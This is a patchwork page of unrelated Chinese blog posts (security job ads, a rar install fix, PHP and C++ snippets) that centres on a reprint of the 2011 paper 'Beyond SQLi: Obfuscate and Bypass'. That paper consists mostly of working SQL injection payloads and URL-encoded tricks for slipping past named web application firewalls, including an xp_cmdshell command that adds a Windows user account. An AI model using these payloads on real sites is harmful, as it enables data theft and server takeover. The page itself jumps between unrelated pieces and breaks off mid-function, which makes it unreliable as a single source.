任职要求：
1.本科以上学历；
2.熟悉网络技术：端口，服务器漏洞扫描，权限管理，入侵和攻击分析，网站渗透，病毒防护等；
3.熟悉安全相关理论和原理：TCP/IP协议，SQL注入，内存缓冲，传输安全，数据包结构等；
4.熟悉windows，linux系统相关漏洞；
5.熟练使用一门脚本语言（ruby、python、shell等）；
5.熟悉主流网络安全软硬件；

工作地点：北京

联系方式 bjlixueqing # 360buy.com

from:http://www.friddy.cn/article.asp?id=128

|=--------------------------------------------------------------------=|
|=--------------=[ Beyond SQLi: Obfuscate and Bypass ]=---------------=|
|=-------------------------=[ 6 October 2011 ]=-----------------------=|
|=----------------------=[  By CWH Underground  ]=--------------------=|
|=--------------------------------------------------------------------=|
				

######
 Info
######

Title	: Beyond SQLi: Obfuscate and Bypass
Author	: "ZeQ3uL" (Prathan Phongthiproek) and "Suphot Boonchamnan"
Team    : CWH Underground [http://www.exploit-db.com/author/?a=1275]
Date	: 2011-10-06


##########
 Contents
##########

  [0x00] - Introduction

  [0x01] - Filter Evasion (Mysql)

		[0x01a] - Bypass Functions and Keywords Filtering
		[0x01b] - Bypass Regular Expression Filtering
		
  [0x02] - Normally Bypassing Techniques

  [0x03] - Advanced Bypassing Techniques

		[0x03a] - HTTP Parameter Pollution: Split and Join
		[0x03b] - HTTP Parameter Contamination
  		
  [0x04] - How to protect your website

  [0x05] - Conclusion

  [0x06] - References

  [0x07] - Greetz To


#######################
 [0x00] - Introduction
#######################

	Welcome readers, this paper is a long attempt at documenting advanced SQL injection we have been working on. 
This papers will disclose advanced bypassing and obfuscation techniques which many of them can be used in the real CMSs and WAFs. The proposed SQL injection statements in this paper are just some ways to bypass the protection. 
There are still some other techniques can be used to attacks web applications but unfortunately we cannot tell you right now, as it is kept as a 0-day attack. However, this paper aims to show that there is no completely secure system 
in the real world even though you spend more than 300,000 USD on a WAF.

	This paper is divided into 7 sections but only from section 0x01 to 0x03 are about technical information.

	Section 0x01, we give a details of how to bypass filter including basic, function and keyword.
Section 0x02, we offer normally bypassing techniques for bypass OpenSource and Commercial WAF.
Section 0x03, we talk in-depth Advanced bypassing techniques that separate into 2 section, "HTTP Parameter Contamination".
and "HTTP Pollution: Split and Join". Section 0x04, we guide to protect your own website on the right solution. 
The last, section 0x05, It's conclusion from Section 0x01-0x04.


#################################
 [0x01] - Filter Evasion (Mysql)
#################################
	
	This section will describe filter evasion behaviors based on PHP and MySQL and how to bypass the filtering. Filter Evasion is a technique used to prevent SQL injection attacks. This technique can be done by using a SQL functions and keywords filtering or regular expressions. 
This means that filter evasion relies heavily upon how storing a black list or regular expression is. If the black list or regular expression does not cover every injection scenario, the web application is still vulnerable to SQL Injection attacks.

	+++++++++++++++++++++++++++++++++++++++++++++++++++
	 [0x01a] - Bypass Functions and Keywords Filtering
	+++++++++++++++++++++++++++++++++++++++++++++++++++
	
		Functions and keywords filtering prevents web applications from being attacked by using a functions and keywords black list. If an attackers submits an injection code containing a keyword or SQL function in the black list, the injection will be unsuccessful. 
	However, if the attacker is able to manipulate the injection by using another keyword or function, the black list will fail to prevent the attack. In order to prevent attacks, a number of keywords and functions has to be put into the black list. However, this affects users 
	when the users want to submit input with a word in the black list. They will be unable to submit the input because it is being filtered by the black list. The following scenarios show cases of using functions and keywords filtering and bypassing techniques.

		
		Keyword filer: 		and, or
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or)/i', $id)

		THe keywords and, or are usually used as a simple test to determine whether a web application is vulnerable to SQL Injection attacks. Here is a simple bypass using &&, || instead of and, or respectively.

		Filtered injection:	1 or 1 = 1		1 and 1 = 1
		Bypassed injection:	1 || 1 = 1		1 && 1 = 1
		----------------------------------------------------------------------


		Keyword filer: 		and, or, union
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union)/i', $id)

		The keyword union is generally used to generate an malicious statement in order to select extra data from the database. 

		Filtered injection:	union select user, password from users
		Bypassed injection:	1 || (select user from users where user_id = 1) = 'admin'

		** Remark: you have to know table name, column name and some data in the table, otherwise you have to get it from information_schema.columns table using other statement 
		e.g. use substring function to get each character of table names.
		----------------------------------------------------------------------

		
		Keyword filer: 		and, or, union, where
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where)/i', $id)
		Filtered injection:	1 || (select user from users where user_id = 1) = 'admin'
		Bypassed injection:	1 || (select user from users limit 1) = 'admin'
		----------------------------------------------------------------------

		
		Keyword filer: 		and, or, union, where, limit
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where|limit)/i', $id)
		Filtered injection:	1 || (select user from users limit 1) = 'admin'
		Bypassed injection:	1 || (select user from users group by user_id having user_id = 1) = 'admin'
		----------------------------------------------------------------------


		Keyword filer: 		and, or, union, where, limit, group by
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where|limit|group by)/i', $id)
		Filtered injection:	1 || (select user from users group by user_id having user_id = 1) = 'admin'
		Bypassed injection:	1 || (select substr(gruop_concat(user_id),1,1) user from users ) = 1
		----------------------------------------------------------------------

		
		Keyword filer: 		and, or, union, where, limit, group by, select
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
		Filtered injection:	1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
		Bypassed injection:	1 || 1 = 1 into outfile 'result.txt'
		Bypassed injection:	1 || substr(user,1,1) = 'a'
		----------------------------------------------------------------------


		Keyword filer: 		and, or, union, where, limit, group by, select, '
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)
		Filtered injection:	1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
		Bypassed injection:	1 || user_id is not null
		Bypassed injection:	1 || substr(user,1,1) = 0x61
		Bypassed injection:	1 || substr(user,1,1) = unhex(61)
		----------------------------------------------------------------------


		Keyword filer: 		and, or, union, where, limit, group by, select, ', hex
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)
		Filtered injection:	1 || substr(user,1,1) = unhex(61)
		Bypassed injection:	1 || substr(user,1,1) = lower(conv(11,10,36))
		----------------------------------------------------------------------


		Keyword filer: 		and, or, union, where, limit, group by, select, ', hex, substr
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)
		Filtered injection:	1 || substr(user,1,1) = lower(conv(11,10,36))
		Bypassed injection:	1 || lpad(user,7,1)
		----------------------------------------------------------------------


		Keyword filer: 		and, or, union, where, limit, group by, select, ', hex, substr, white space
		----------------------------------------------------------------------
		PHP filter code:	preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)
		Filtered injection:	1 || lpad(user,7,1)
		Bypassed injection:	1%0b||%0blpad(user,7,1)
		----------------------------------------------------------------------


		From the above examples, it can be seen that there are a number of SQL statements used for bypassing the black list although the black list contains many keywords and functions. 
	Furthermore, there are a huge SQL statements, that are not on the mentioned examples, that can be used to bypass the black list.

		Creating a bigger black list is not a good idea to protect your own websites. Remember, the more keywords and functions filtering, the less user friendly.


	+++++++++++++++++++++++++++++++++++++++++++++++
	 [0x01b] - Bypass Regular Expression Filtering
	+++++++++++++++++++++++++++++++++++++++++++++++

		Regular expression filtering is a better solution to prevent SQL injection than keywords and functions filtering because it is used pattern matching to detect attacks. Valid users are allowed to submit more flexible input to the server. 
	However, many regular expression can also be bypassed. The following examples illustrate injection scripts that used to bypass regular expressions in the OpenSource PHPIDS 0.6.

	PHPIDS generally blocks input containing = or ( or ' following with any a string or integer e.g. 1 or 1=1, 1 or '1', 1 or char(97). However, it can be bypassed using a statement that does not contain =, ( or ' symbols. 

	[Code]---------------------------------------------------------------		
	filtered injection:		1 or 1 = 1
	Bypassed injection:		1 or 1
	[End Code]----------------------------------------------------------- 

	[Code]---------------------------------------------------------------		
	filtered injection:		1 union select 1, table_name from information_schema.tables where table_name = 'users'
	filtered injection:		1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'
	filtered injection:		1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)
	Bypassed injection:		1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a
	Bypassed Injection:		1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273
	[End Code]----------------------------------------------------------- 



########################################
 [0x02] - Normally Bypassing Techniques
########################################

	In this section, we mention about the techniques to bypass Web Application Firewall (WAF). First thing you need to know what's WAF?
	
	A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. 
Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, 
many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.
	WAFs are often called 'Deep Packet Inspection Firewalls' coz they look at every request and response within the HTTP/HTTPS/SOAP/XML-RPC/Web service lacers.
Some modern WAF systems work both with attack signatures and abnormal behavior.

	Now Let's rock to understand How to breach it with obfuscate, All WAFs can be bypassed with the time to understand their rules or using your imagination !!

	
	1. Bypass with Comments

		SQL comments allow us to bypass a lot of filtering and WAFs.
	
		[Code]---------------------------------------------------------------		
		http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3--
		[End Code]-----------------------------------------------------------


	2. Case Changing

		Some WAFs filter only lowercase SQL keyword.	

		Regex Filter: /union\sselect/g
	
		[Code]---------------------------------------------------------------		
		http://victim.com/news.php?id=1+UnIoN/**/Select/**/1,2,3--
		[End Code]-----------------------------------------------------------


	3. Replaced keywords

		Some application and WAFs use preg_replace to remove all SQL keyword. So we can bypass easily.	
	
		[Code]---------------------------------------------------------------		
		http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--
		[End Code]-----------------------------------------------------------

		Some case SQL keyword was filtered out and replaced with whitespace. So we can use "%0b" to bypass.

		[Code]---------------------------------------------------------------		
		http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--
		[End Code]-----------------------------------------------------------

		For Mod_rewrite, Comments "/**/" cannot bypassed. So we use "%0b" replace "/**/".

		Forbidden: http://victim.com/main/news/id/1/**/||/**/lpad(first_name,7,1).html
		Bypassed : http://victim.com/main/news/id/1%0b||%0blpad(first_name,7,1).html
	


	4. Character encoding

		Most CMSs and WAFs will decode and filter/bypass an application input, but some WAFs only decode the input once so 
		double encoding can bypass certain filters as the WAF will decode the input once then filter while application keep
		decoding the SQL statement executing
	
		[Code]-----------------------------------------------------------------------------------------------------------------
		http://victim.com/news.php?id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
		[End Code]-------------------------------------------------------------------------------------------------------------
				
		Moreover, these techniques can combine to bypass Citrix Netscaler
			- Remove all "NULL" words
			- Use query encoding in some parts
			- Remove the single quote character "'"
			- And Have fun !!
			Credit: Wendel Guglielmetti Henrique	
		
		and "Armorlogic Profense"  prior to 2.4.4 was bypassed by URL-encoded newline character.


		#Real World Example
		
		1. NukeSentinel (Nuke Evolution)
		
		[Nukesentinel.php Code]------------------------------------------------------------
		// Check for UNION attack
		// Copyright 2004(c) Raven PHP Scripts
		$blocker_row = $blocker_array[1];
		if($blocker_row['activate'] > 0) {
 		 if (stristr($nsnst_const['query_string'],'+union+') or \
		stristr($nsnst_const['query_string'],'%20union%20') or \
		stristr($nsnst_const['query_string'],'*/union/*') or \
		stristr($nsnst_const['query_string'],' union ') or \
		stristr($nsnst_const['query_string_base64'],'+union+') or \
		stristr($nsnst_const['query_string_base64'],'%20union%20') or \
		stristr($nsnst_const['query_string_base64'],'*/union/*') or \
		stristr($nsnst_const['query_string_base64'],' union ')) {  // block_ip($blocker_row);
		   die("BLOCK IP 1 " );
		  }
		}
		[End Code]-------------------------------------------------------------------------

		We can bypass their filtering with these script:
		
		Forbidden: http://victim.com/php-nuke/?/**/union/**/select…..
		Bypassed : http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select…
		Bypassed : http://victim.com/php-nuke/?%2f**%2funion%2f**%2fselect…


		2. Mod Security CRS (Credit: Johannes Dahse)
		
		[SecRule]--------------------------------------------------------------------------
		SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" \ "phase2,rev:'2.2.1',capture,t:none,
		t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,
		msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',
		tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',
		setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},
		setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"
		[End Rule]-------------------------------------------------------------------------

		We can bypass their filtering with this code:
		
		[Code]------------------------------------------------------------------------------
		http://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
		[End Code]--------------------------------------------------------------------------

		From this attack, We can bypass Mod Security rule. Let see what's happen !! 
		
		MySQL Server supports 3 comment styles:
			- From a "#" character to the end of the line
			- From a "--" sequence to the end of the line
			- From a /* sequence to the following */ sequence, as in the C programming language.
			  This syntax enables a comment to extend over multiple lines because the beginning and closing sequences need
			  not be on the same line.

		The following example, We used "%0D%0A" as the new line characters. Let's take a look at the first request(to extract the DB user)
		The resulting SQL payload looked something like this:

			0 div 1 union#foo*/*/bar
			select#foo
			1,2,current_user
		
		However the SQL payload, when executed by the MySQL DB, looked something like this:

			0 div 1 union select 1,2,current_user	


	5. Buffer Overflow

		WAFs that written in the C language prone to overflow or act differently when loaded with a bunch of data.
		Give a large amount of data allows our code executing	
	
		[Code]------------------------------------------------------------------------------
		http://victim.com/news.php?id=1+and+(select 1)=(select 0x414141414141441414141414114141414141414141414141414141
		414141414141….)+union+select+1,2,version(),database(),user(),6,7,8,9,10--
		[End Code]--------------------------------------------------------------------------

	
	6. Inline Comments (Mysql Only)

		From MySQL 5.0 Reference Manual, MySQL Server supports some variants of C-style comments. These enable you to write
		code that includes MySQL extensions, but is still portable, by using comments of the following form:

		/*! MySQL-specific code */
		
		In this case, MySQL Server parses and executes the code within the comment as it would any other SQL statement,
		but other SQL servers will ignore the extensions.
		
		A lot of WAFs filter SQL keywords like /union\sselect\ig We can bypass this filter by using inline comments.
		
		[Code]------------------------------------------------------------------------------
		http://victim.com/news.php?id=1/*!UnIoN*/Select+1,2,3--
		[End Code]--------------------------------------------------------------------------
		
		Inline comments can be used throughout the SQL statement so if table_name or information_schema are filtered we can
		add more inline comments
	
		[Code]------------------------------------------------------------------------------
		http://victim.com/news.php?id=/*!UnIoN*/+/*!Select*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables
		/*!Where*/+/*!TaBlE_sChEMa*/+like+database()--
		[End Code]--------------------------------------------------------------------------

		In a recent penetration test, we were able to bypass a Mod Security CRS and PentaSecurity-WAPPLE using this technique. More information show below:
		
		#################################################################################################################

		Vendor : Penta Security System
		Product: Wapple Web Application Firewall
		Patch released: 2011-10-02 (In SQL Injection Custom Policy Mode)
		Publish released: 2011-10-04
		Credit : Prathan Phongthiproek and Suphot Boonchamnan
	
		These scripts can all SQL Injection rules:	
			1 ||1=1
			1 /*!order by*/ 3
			1 /*!union select*/ 1,table_name from /*!information_schema.tables*/
			1 /*!union select*/ 1,column_name from /*!information_schema.columns where table_name = 0x7573657273*/
			1 /*!union select*/ /*!user,password*/ from /*!users*/
		################################################################################################################
		

	
########################################	
 [0x03] - Advanced Bypassing Techniques
########################################
		
	In this section, we offer 2 techniques are "HTTP Pollution: Split and Join" and "HTTP Parameter Contamination". 
From these techniques can bypass a lot of OpenSource and Commercial Web application firewall (WAF)
     
     
	++++++++++++++++++++++++++++++++++++++++++++++++++++
	 [0x03a] - HTTP Parameter Pollution: Split and Join
	++++++++++++++++++++++++++++++++++++++++++++++++++++

		HTTP Pollution is a new class of injection vulnerability by Luca Carettoni and Stefano Di Paola. HPP is a quite simple but
	effective hacking technique. HPP attacks can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting 
	query string. 

	Example of HPP: "http://victim.com/search.aspx?par1=val1&par1=val2"

	HTTP Parameter Handling: (Example)
	
	+------------------------------------------------------------------+
	| Web Server 	  | Parameter Interpretation	 | Example	   |
	+------------------------------------------------------------------+
	| ASP.NET/IIS	  | Concatenation by comma	 | par1=val1,val2  |
	| ASP/IIS	  | Concatenation by comma	 | par1=val1,val2  |
	| PHP/Apache	  | The last param is resulting  | par1=val2	   |
	| JSP/Tomcat	  | The first param is resulting | par1=val1	   |
	| Perl/Apache	  | The first param is resulting | par1=val1	   |
	| DBMan		  | Concatenation by two tildes  | par1=val1~~val2 |
	+------------------------------------------------------------------+
	
		What would happen with WAFs that do Query String parsing before applying filters ? (HPP can be used even to bypass WAFs)
	Some loose WAFs may analyze and validate a single parameter occurrence only (first or last one). Whenever the deal environment concatenates
	multiple occurrences (ASP, ASP.NET, DBMan,…) an aggressor can split the malicious payload.

		In a recent penetration test (Again), we were able to bypass a Imperva SecureSphere using "HPP+Inline Comment" on ASP/ASP.NET environment.
	This technique can bypass other Commercial WAFs too. More information about "HPP+Inline Comment" show below:	

	
	#Real World Example:

	1. Mod Security CRS (Credit: Lavakumar Kuppan)
		
		The following request matches against the ModSecurity CRS as a SQL Injection attack and is blocked.
		
		Forbidden: http://victim.com/search.aspx?q=select name,password from users

		When the same payload is split against multiple parameters of the same name ModSecurity fails to block it.

		Bypassed : http://victim.com/search.aspx?q=select name&q=password from users

		
		Let's see what's happen, ModSecurity's interpretation is
		
		q=select name
		q=password from users

		ASP/ASP.NET's interpretation is
		q=select name,password from users

		*Tip: This attack can be carried out on a POST variable in a similar way


	2. Commercial WAFs
		
		Forbidden: http://victim.com/search.aspx?q=select name,password from users

		Now we use HPP+Inline comment to bypass it.

		Bypassed : http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/users

		
		Analyzing, WAF's interpretation is

		q=select/*
		q=*/name
		q=password/*
		q=*/from/*
		q=*/users
		
		ASP/ASP.NET's interpretation is
		q=select/*,*/name,password/*,*/from/*,*/users
		q=select name,password from users


	3. IBM Web Application Firewall (Credit: Wendel Guglielmetti Henrique of Trustwave's SpiderLabs)
		
		Forbidden: http://victim.com/news.aspx?id=1'; EXEC master..xp_cmdshell “net user zeq3ul UrWaFisShiT /add” --

		Now we use HPP+Inline comment to bypass it.

		Bypassed : http://victim.com/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ “net user lucifer UrWaFisShiT” /*&id=1*/ --

		
		Analyzing, WAF's interpretation is

		id=1’; /*
		id=1*/ EXEC /*
		id=1*/ master..xp_cmdshell /*
		id=1*/ “net user zeq3ul UrWaFisShiT” /*
		id=1*/ --
		
		ASP/ASP.NET's interpretation is
		id=1’; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ “net user zeq3ul UrWaFisShiT” /*,1*/ --
		id=1’; EXEC master..xp_cmdshell “net user zeq3ul UrWaFisShiT” --
		

		The easiest mitigation to this attack would be for the WAF to disallow multiple instances of the same parameter in a single HTTP request. 
	This would prevent all variations of this attack.
		However this might not be possible in all cases as some applications might have a legitimate need for multiple duplicate parameters. 
	And they might be designed to send and accept multiple HTTP parameters of the same name in the same request.To protect these applications the WAF 
	should also interpret the HTTP request in the same way the web application would.

		
	++++++++++++++++++++++++++++++++++++++++
	 [0x03b] - HTTP Parameter Contamination
	++++++++++++++++++++++++++++++++++++++++

		HTTP Parameter Contamination (HPC) original idea comes from the innovative approach found in HPP research by 
	exploring deeper and exploiting strange behaviors in Web Server components, Web Applications and Browsers as a result of query string
	parameter contamination with reserved or non expects characters. 
	
	Some facts:
     	- The term Query String is commonly used to refer to the part between the  "?" and the end of the URI
	- As defined in the RFC 3986, it is a series of field-value pairs
	- Pairs are separated by "&" or ";"
	- RFC 2396 defines two classes of characters:
		Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ()
		Reserved  : ; / ? : @ & = + $ ,
		Unwise    : { } | \ ^ [ ] ` 

		Different web servers have different logic for processing special created requests. There are more web server, backend platform and special character combinations,
	but we will stop here this time.

	Query string and Web server response (Example)
	
	+-----------------------------------------------------------+
	| Query String	  |    Web Servers response / GET values    |
	+-----------------------------------------------------------+
	| 		  | Apache/2.2.16, PHP/5.3.3 | IIS6/ASP	    |
	+-----------------------------------------------------------+
	| ?test[1=2	  | test_1=2	 	     | test[1=2	    |
	| ?test=%  	  | test=%		     | test=	    |
	| ?test%00=1	  | test=1	       	     | test=1	    |
	| ?test=1%001	  | NULL		     | test=1	    |
	| ?test+d=1+2	  | test_d=1 2		     | test d=1 2   |
	+-----------------------------------------------------------+
	
	Magic character "%" affect to ASP/ASP.NET	

	+--------------------------------------------------------------------+
	| 	Keywords     |        WAF   		  |  ASP/ASP.NET     |
	+--------------------------------------------------------------------+
	| sele%ct * fr%om..  | sele%ct * fr%om.. 	  | select * from..  |
	| ;dr%op ta%ble xxx  | ;dr%op ta%ble xxx	  | ;drop table xxx  |
	| <scr%ipt>	     | <scr%ipt>		  | <script>	     |
	| <if%rame>	     | <if%rame>		  | <iframe>         |
	+--------------------------------------------------------------------+


	#Real world examples:

	1. Bypass Mod_Security SQL Injection rule (modsecurity_crs_41_sql_injection_attacks.conf) 

		[Filtered]----------------------------------------------------------------------------------
	
		[Sun Jun 12 12:30:16 2011] [error] [client 192.168.2.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\bsys\\.user_objects\\b" 
		at ARGS_NAMES:sys.user_objects. [file "/etc/apache2/conf.d/crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "110"] [id "959519"] 
		[rev "2.2.0"] [msg 	"Blind SQL Injection Attack"] [data "sys.user_objects"] [severity "CRITICAL"] [tag "WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] 
		[tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "localhost"] [uri "/"] [unique_id "TfT3gH8AAQEAAAPyLQQAAAAA"]

		[End Code]------------------------------------------------------------------------------

		Forbidden: http://localhost/?xp_cmdshell
		Bypassed : http://localhost/?xp[cmdshell

	2. Bypass URLScan 3.1 DenyQueryStringSequences rule
	
		Forbidden: http://localhost/test.asp?file=../bla.txt
		Bypassed : http://localhost/test.asp?file=.%./bla.txt

	3. Bypass AQTRONIX Webknight (WAF for IIS and ASP/ASP.Net)

		Forbidden: http://victim.com/news.asp?id=10 and 1=0/(select top 1 table_name from information_schema.tables)
		Bypassed : http://victim.com/news.asp?id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)

		From this situation, Webknight use SQL keywords filtering when we use "HTTP contamination" by insert "%" into SQL keywords WAF is bypassed and sending these
		command to Web server: "id=10 and 1=0/(select top 1 table_name from information_schema.tables)" because "%" is cutter in web server.
	

		These types of hacking techniques are always interesting because they reveal new perspectives on security problems.
	Many applications are found to be vulnerable to this kind of abuse because there are no defined rules for strange web server behaviors.
		HPC can be used to extend HPP attack with spoofing real parameter name in the QUERY_STRING with "%" character on an IIS/ASP platform,
	if there is WAF who blocks this kind of an attack.

	

######################################	
 [0x04] - How to protect your website
######################################

- Implement Software Development Life Cycle (SDLC)
- Secure Coding: Validate all inputs and outputs
- PenTest before online
- Harden it !!
- Revisit PenTest
- Deploy WAF (For Optional)
- Always check WAF patch


#####################	
 [0x05] - Conclusion
#####################
 
- WAFs is not the long-expected
- It's functional limitations, WAF is not able to protect a web app from all possible vulnerabilities
- It's necessary to adapt WAF filter to the particular web app being protected
- WAF doesn't eliminate a vulnerability, It just partly screens the attack vector


#####################
 [0x06] - References
#####################

[1] WAF Bypass: SQL Injection - Kyle
[2] http://cwe.mitre.org/data/definitions/98.html
[3] HTTP Parameter Contamination - Ivan Markovic NSS
[4] Split and Join - Lavakumar Kuppan
[5] HTTP Parameter Pollution - Luca Carettoni and Stefano di Paola
[6] blog.spiderlabs.com


####################
 [0x07] - Greetz To
####################
	
Greetz	    :  ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
Special Thx :  Exploit-db.com


				----------------------------------------------------
		Our disclosure purpose isn't helping security products but need to reveal theirs shit. 
		   Security Products not able to 100% protect from damn config/coding of admin. 
				  Just need a time and imagination for breach it !!
				----------------------------------------------------

打开压缩包是空的，所以此次在linux下安装rar并没有成功，根据错误信息应该是GLIBC_2.7′这个库的问题

查询了一番，找到的最简单的解决方案竟然是直接将源码包中的rar_static文件覆盖安装目录下的rar文件

根据makefile我们可以找到rar脚本的位置:/usr/local/bin

然后执行命令即可

#cp rar_static /usr/local/bin/rar

from:http://www.wood-moon.org/index.php/rar-liblibc-so-6-version-glibc_2-7-not-found-required-by-rar

对淘宝登录输入密码的那个框框感觉很不满意！

对不能在mac下顺利付款购物感觉很不满意！

对海量的会员信息和行为很感兴趣；

对移动领域的电子商务和网络支付很感兴趣；

并且你，和我一样：

明白互联网公司应该 “以人为本，用户为王”；

明白安全和安全感是都是及其重要的用户体验；

了解钓鱼网站，木马劫持，黑色产业链；

了解用户网购心理，痛恨诈骗团伙；

再或者，你也对下面这些现象深恶痛绝，并打算亲自操刀改变这一切：

遍地都是免费杀毒软件的今天，电脑上依然潜伏着众多木马病毒，

网络上居然还有一群群邪恶大叔天天通过花言巧语欺骗他人来发财致富，

漂亮的图片背后，对应的却是劣质的商品，难道ps一出，世间真的再无真相？

那么，欢迎你来淘宝，和我们一起，通过产品经理这个岗位，改变世界。

一般来讲，这里的产品经理岗位要求具备以下几点基本素质：

热爱互联网安全

了解互联网黑色产业链

独到的行业洞察力

出众的口头及书面沟通技巧

卓越的团队影响力和引导力

关注细节,一流的执行力

这里准备了以下几种岗位，有兴趣的朋友可以发简历给我：zhiyong.zjw@taobao.com，或者有认识相关方面朋友的也可以推荐过来，推荐成功的有推荐奖金。

会员基础产品经理，职责keywords：注册、登录、基础信息

会员安全产品经理，职责keywords：盗号、钓鱼、木马、身份认证、刷库

无线安全产品经理，职责keywords：手机、wap、app、双因素认证

交易安全产品经理，职责keywords：诈骗、流程、规则

客户端安全产品经理，职责keywords：客户端、木马、劫持、反汇编、逆向工程、驱动

工作地点: 杭州

工作薪酬: 年薪20W起，具体面议

再发一下联系方式：zhiyong.zjw@taobao.com

另有业务安全开发工程师、业务安全架构师，手机软件开发工程师，开发leader，等一系列岗位，有合适的朋友可帮忙内推。

----------------------------------------

刚开始，我以为技术就是一切，潜心研究各种安全技术，希望用技术来解决一切问题；

后来我发现，一种技术只能解决一部分特定的问题，而我们的千千万万网民每天遇到的各种安全问题，并不是靠技术能完全解决，我试图去解决更多用户安全问题的时候，我发现了产品经理这种职位。

我希望遇到这样的一个你，既懂得用户体验和商业价值，又有着雄厚的安全技术做背景，而且绝不会钻进技术牛角尖。

来自：http://spark.42qu.com/10093359

上海某上市游戏公司招聘网络安全工程师1名，要求一年左右工作经验，具有较强的自学能力。
公司的工作环境比较轻松，公司的人员也都比较年轻，比较好相处，正在找工作的朋友可以看看，详情如下：

职位描述：
1、关注最新的网络安全漏洞、病毒公告，并及时采取防范措施以保障公司的网络安全；
2、定期对公司产品进行漏洞扫描、安全评估等，并生成网络安全评估报告；
3、负责对信息安全事件进行调查、处理、跟踪；
4、参与公司信息安全体系建设。

具体要求：
1、计算机、通信等相关专业本科及以上学历（能力突出者不受此限），一年左右信息安全相关工作经验；
2、熟悉网络体系结构、OSI模型、TCP/IP协议，具有扎实的信息安全理论知识；
3、熟悉常见的网络安全攻击手段、原理、防范方法；
4、了解常见的网络安全产品的原理及使用（如：防火墙、VPN、IDS、扫描器等）；
5、熟悉Windows、Linux操作系统，经培养后能独立完成应急响应工作；
6、为人随和，爱思考，具有较强的自学能力、适应能力。

薪水方面需要自已和人事谈，有兴趣的请投简历到：offering_at_126.com，合适的话会通知面试，谢谢！

工作地点：北京

待遇：面议
联系方式:dan.liu#renren-inc.com

2.需使用到php的一个开源库：imagemagick，安装方法：Google中搜索“ImageMagick php windows 安装”，当然如果你是Linux的话，将Windows替换为Linux即可。

3.安装好了，关键是如何使用，经过几个小时的折腾，最终实现了转换，非常简单：

$mw= NewMagickWand();
MagickReadImage($mw, '123.psd');
MagickResetIterator($mw);
MagickWriteImage($mw,"123.jpg");

以下代码在CentOS5下测试可用。

//============================================================================
// Name        : m d 5.cpp
// Author      : Neeao
// Version     :
// Copyright   : http://Neeao.com
//============================================================================

#include <iostream>
#include <openssl/md5.h>
#include <fstream>

using namespace std;
/**
 * 字符串md5
 */
string string_md5(string str)
{
		unsigned char md[16];
		char tmp[33]={'\0'};
		string hash="";
		MD5((const unsigned char*)str.c_str(), str.size(), md);
		for(int i=0; i<16; i++){
				sprintf(tmp, "%02X", md[i]);
				hash+=(string)tmp;
		}
		return hash;
}
/**
 * 文件 md5
 */
string file_md5(string file_name)
{
		MD5_CTX md5;
		unsigned char md[16];
		char tmp[33]={'\0'};
		int length,i;
		char buffer[1024];
		string hash="";
		MD5_Init(&md5);
		ifstream fin(file_name.c_str(),ios::in|ios::binary);
		while(!fin.eof())
			{
						fin.read(buffer, 1024);
						length = fin.gcount();
						if (length > 0) {
							MD5_Update(&md5,buffer, length);
						}
			}
			MD5_Final(md,&md5);
			for(i=0; i<16; i++){
					sprintf(tmp, "%02X", md[i]);
